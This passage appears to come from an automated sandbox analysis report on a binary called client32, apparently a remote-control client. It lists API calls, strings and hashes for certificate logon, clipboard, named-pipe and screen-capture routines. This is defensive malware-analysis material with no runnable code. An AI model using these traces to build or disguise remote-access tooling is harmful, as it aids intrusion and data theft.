                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110AC8DA
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110AC8E7
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110AC8F4
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110AC901
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110AC90E
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110AC91B
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110AC928
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110AC935
                                                                                                                                                                • GetModuleHandleA.KERNEL32(Advapi32.dll,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110AD69E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CredMarshalCredentialA), ref: 110AD6B0
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 110AD6C8
                                                                                                                                                                • GetLastError.KERNEL32(?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110AD71C
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?), ref: 110ADAC2
                                                                                                                                                                • SetLastError.KERNEL32(00000057,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110ADB0C
                                                                                                                                                                • FreeLibrary.KERNEL32(?,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?,?,?,FFFFFFFF), ref: 110ADB1D
                                                                                                                                                                Strings
                                                                                                                                                                • CertGetCertificateContextProperty (1) failed (%d), xrefs: 110AD934
                                                                                                                                                                • \\.\%s\, xrefs: 110AD736
                                                                                                                                                                • LogonUserWithCert - CredMarshalCredential FAILED (%d), xrefs: 110ADA60
                                                                                                                                                                • LogonUserWithCert - Crypt32.dll NOT found!!!, xrefs: 110AD630
                                                                                                                                                                • AttemptLogon FAILED [status: 0x%08x], xrefs: 110ADA3D
                                                                                                                                                                • CredMarshalCredentialA, xrefs: 110AD6A4
                                                                                                                                                                • LogonUserWithCert - Advapi32.dll does NOT provide required functionality!, xrefs: 110ADA6A
                                                                                                                                                                • CertGetCertificateContextProperty (3) FAILED (%d), xrefs: 110AD9B6
                                                                                                                                                                • CredFree, xrefs: 110AD6BC
                                                                                                                                                                • LogonUserWithCert - Crypt32.dll does NOT provide required functionality!, xrefs: 110ADA7E
                                                                                                                                                                • LogonUserWithCert FAILED (%d) , xrefs: 110ADAFA
                                                                                                                                                                • Advapi32.dll, xrefs: 110AD699
                                                                                                                                                                • CertAddCertificateContextToStore FAILED (%d), xrefs: 110AD8FC
                                                                                                                                                                • CryptGetProvParam FAILED (%d), xrefs: 110AD864, 110AD8BB
                                                                                                                                                                • CertGetCertificateContextProperty (2) FAILED (%d), xrefs: 110AD97B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ErrorLastLibrary$ContextCryptFreeHandleLoadModuleRelease
                                                                                                                                                                • String ID: Advapi32.dll$AttemptLogon FAILED [status: 0x%08x]$CertAddCertificateContextToStore FAILED (%d)$CertGetCertificateContextProperty (1) failed (%d)$CertGetCertificateContextProperty (2) FAILED (%d)$CertGetCertificateContextProperty (3) FAILED (%d)$CredFree$CredMarshalCredentialA$CryptGetProvParam FAILED (%d)$LogonUserWithCert - Advapi32.dll does NOT provide required functionality!$LogonUserWithCert - CredMarshalCredential FAILED (%d)$LogonUserWithCert - Crypt32.dll NOT found!!!$LogonUserWithCert - Crypt32.dll does NOT provide required functionality!$LogonUserWithCert FAILED (%d) $\\.\%s\
                                                                                                                                                                • API String ID: 455412317-1640292549
                                                                                                                                                                APIs
                                                                                                                                                                • IsIconic.USER32(?), ref: 111132BA
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1111332E
                                                                                                                                                                • CreateRectRgn.GDI32(00000000,?,?,?), ref: 11113352
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 11113402
                                                                                                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 11113534
                                                                                                                                                                • CreateRectRgn.GDI32(?,?,?,?), ref: 1111358F
                                                                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 111135A3
                                                                                                                                                                • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 111135C8
                                                                                                                                                                • GetRgnBox.GDI32(00000000,?), ref: 111135D3
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 111135E1
                                                                                                                                                                • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1111366B
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1111367A
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11113684
                                                                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 111136C2
                                                                                                                                                                • GetWindowOrgEx.GDI32(?,?), ref: 111136D7
                                                                                                                                                                • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1111371C
                                                                                                                                                                • GetKeyState.USER32(000000A3), ref: 11113747
                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1111378B
                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1111379D
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 111137B1
                                                                                                                                                                • Polyline.GDI32(00000000,?,00000005), ref: 111137C7
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 111137CF
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 111137E0
                                                                                                                                                                • Polyline.GDI32(00000000,?,00000005), ref: 111137F3
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 111137FB
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1111380C
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11113816
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11113820
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 11113845
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 879653699-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenu.USER32(?), ref: 11025637
                                                                                                                                                                • DrawMenuBar.USER32(?), ref: 1102564E
                                                                                                                                                                • GetMenu.USER32(?), ref: 110256A3
                                                                                                                                                                • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110256B1
                                                                                                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102560E
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 110256F7
                                                                                                                                                                • IsIconic.USER32(?), ref: 1102570A
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102572A
                                                                                                                                                                • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 11025790
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                                                • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3085788722-363603473
                                                                                                                                                                • Opcode ID: f15b31b09d6730742c8f3530f633c1eaf3e2e501aa0880703a951233f58358ed
                                                                                                                                                                • Instruction ID: f097ee6c6ab1d2536d1fd0b1bb7039a4e68c359c164a3241977e36a4c1c69446
                                                                                                                                                                • Opcode Fuzzy Hash: f15b31b09d6730742c8f3530f633c1eaf3e2e501aa0880703a951233f58358ed
                                                                                                                                                                • Instruction Fuzzy Hash: 5DD19F74B40701ABE714DBA4CC95FAEB3E5AB88708F104518F6169F3C1DAB1F941CB95
                                                                                                                                                                APIs
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                                                                                                • _sprintf.LIBCMT ref: 1103B2BB
                                                                                                                                                                • _fputs.LIBCMT ref: 1103B330
                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                                                                                                • _free.LIBCMT ref: 1103B336
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                                                                                                  • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                                                                                                • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 383231468-3762817415
                                                                                                                                                                • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                                                                                • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                                                                                                • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                                                                                • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CB339
                                                                                                                                                                • IsIconic.USER32(00000001), ref: 110CB349
                                                                                                                                                                • GetClientRect.USER32(00000001,?), ref: 110CB358
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 110CB36D
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 110CB374
                                                                                                                                                                • IsIconic.USER32(00000001), ref: 110CB3A4
                                                                                                                                                                • GetWindowRect.USER32(00000001,?), ref: 110CB3B3
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,11185BBB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB467
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                                • API String ID: 2655531791-1552842965
                                                                                                                                                                • Opcode ID: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                                                                                                • Instruction ID: 7d040125c55bf73af4456014bc99c48d8e10f47c0045797434645e7542fd0d49
                                                                                                                                                                • Opcode Fuzzy Hash: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                                                                                                • Instruction Fuzzy Hash: 2C51C175E0061AAFCB10CFA4CC84FEEB7F8FB48754F0481A9E915A7280EA74A940CF50
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110F3470
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F3410
                                                                                                                                                                • CreateNamedPipe %s failed, error %d, xrefs: 110F3478
                                                                                                                                                                • pSD, xrefs: 110F3415
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                                                                                                • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                                                                                                • API String ID: 3134831419-838605531
                                                                                                                                                                • Opcode ID: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                                                                                                • Instruction ID: e749730b24da6d9d65aa5dc542e4a1298255c3932a1a24cca1bc6d9c8703c538
                                                                                                                                                                • Opcode Fuzzy Hash: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                                                                                                • Instruction Fuzzy Hash: 0821DD75E54229BBE7119B64CC8AFAFB76CE744719F014210FE25672C0C7B05A018790
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,11025FDE), ref: 1111578B
                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 111157A0
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 111157F9
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 1111583D
                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00000100,00000000,00000000,?,00000004,?,00000000), ref: 1111586C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11115896
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateName$CloseControlDeviceHandleModulePathShort_strrchr
                                                                                                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                                • API String ID: 1856440361-3179819359
                                                                                                                                                                • Opcode ID: c23de974ba00f03547b25e2f40332119e28910f2fea34cb9d27f0557c0e7f6c0
                                                                                                                                                                • Instruction ID: 2a95a0e342f63f1705806fe8621d4f60ab1de585f301dcf54d2bbd4509b04617
                                                                                                                                                                • Opcode Fuzzy Hash: c23de974ba00f03547b25e2f40332119e28910f2fea34cb9d27f0557c0e7f6c0
                                                                                                                                                                • Instruction Fuzzy Hash: 3541C331A44318ABE724DF64DC91FDAF7B5AB48708F0081A9E269DB2C4D7B16944CB94
                                                                                                                                                                APIs
                                                                                                                                                                • OpenClipboard.USER32(?), ref: 1101F6D7
                                                                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F6E7
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 1101F6F0
                                                                                                                                                                • _memmove.LIBCMT ref: 1101F6F9
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 1101F702
                                                                                                                                                                • EmptyClipboard.USER32 ref: 1101F708
                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 1101F711
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1101F71C
                                                                                                                                                                • MessageBeep.USER32(00000030), ref: 1101F724
                                                                                                                                                                • CloseClipboard.USER32 ref: 1101F72A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3255624709-0
                                                                                                                                                                • Opcode ID: fb15205abc29bec5019ffcbc0ab34e754b0c0ba96522bb8b908837259c46bf13
                                                                                                                                                                • Instruction ID: 34c6a6685e13fb0ccb6c07c6f506601fca20899cc20b0e7c19a582f503bea576
                                                                                                                                                                • Opcode Fuzzy Hash: fb15205abc29bec5019ffcbc0ab34e754b0c0ba96522bb8b908837259c46bf13
                                                                                                                                                                • Instruction Fuzzy Hash: 9301D83A9155266BE3066B708CCCEABBAECFF9535D7051078F425C6108EB64C9058762
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                                                                                • API String ID: 0-293745777
                                                                                                                                                                • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                                                                                • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                                                                                                • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                                                                                • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                                                                                                  • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                                                                                                  • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                                                                                                  • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                                                                                                  • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                                                                                                  • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                                                                                                  • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                                                                                                  • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                                                                                                  • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                                                                                                  • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                                                                                                  • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                                                                                                • String ID: NSMClassList$NSMFindClassEvent
                                                                                                                                                                • API String ID: 1622498684-2883797795
                                                                                                                                                                • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                                                                                • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                                                                                                • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                                                                                • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                                                                                  • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                                                                                • _memset.LIBCMT ref: 1115B266
                                                                                                                                                                • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                                                                                                • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 1115B309
                                                                                                                                                                • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2935161463-0
                                                                                                                                                                • Opcode ID: d66091308fdfd0a49dadcbc9bdab6e46a9e7118830d76630c2efa76ef6861ce1
                                                                                                                                                                • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                                                                                                • Opcode Fuzzy Hash: d66091308fdfd0a49dadcbc9bdab6e46a9e7118830d76630c2efa76ef6861ce1
                                                                                                                                                                • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1114776D
                                                                                                                                                                • wsprintfA.USER32 ref: 1114778B
                                                                                                                                                                • OutputDebugStringA.KERNEL32(?), ref: 111477A1
                                                                                                                                                                  • Part of subcall function 11143DE0: GetTickCount.KERNEL32 ref: 11143E48
                                                                                                                                                                  • Part of subcall function 11147400: GetCurrentThreadId.KERNEL32 ref: 11147413
                                                                                                                                                                  • Part of subcall function 11147400: wsprintfA.USER32 ref: 11147493
                                                                                                                                                                  • Part of subcall function 11147400: IsBadReadPtr.KERNEL32(?,00000001), ref: 111474B8
                                                                                                                                                                  • Part of subcall function 11147400: wsprintfA.USER32 ref: 111474D8
                                                                                                                                                                  • Part of subcall function 11147400: wsprintfA.USER32 ref: 111474F5
                                                                                                                                                                • OutputDebugStringA.KERNEL32(?), ref: 111477E6
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 111477E9
                                                                                                                                                                  • Part of subcall function 110B7A70: GetLastError.KERNEL32(1110F4CB,11194AB8,?,?,11029561,?,11194AB8,1110F4CB,00000000), ref: 110B7A9C
                                                                                                                                                                  • Part of subcall function 110B7A70: _strrchr.LIBCMT ref: 110B7AAB
                                                                                                                                                                  • Part of subcall function 110B7A70: _strrchr.LIBCMT ref: 110B7ACD
                                                                                                                                                                  • Part of subcall function 110B7A70: GetTickCount.KERNEL32 ref: 110B7AFD
                                                                                                                                                                  • Part of subcall function 110B7A70: GetTickCount.KERNEL32 ref: 110B7B28
                                                                                                                                                                  • Part of subcall function 110B7A70: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B7B4C
                                                                                                                                                                  • Part of subcall function 110B7A70: TranslateMessage.USER32(?), ref: 110B7B55
                                                                                                                                                                  • Part of subcall function 110B7A70: DispatchMessageA.USER32(?), ref: 110B7B5E
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 11147809
                                                                                                                                                                Strings
                                                                                                                                                                • Exception caught at %x. Trying minidump., xrefs: 11147785
                                                                                                                                                                Memory Dump Source
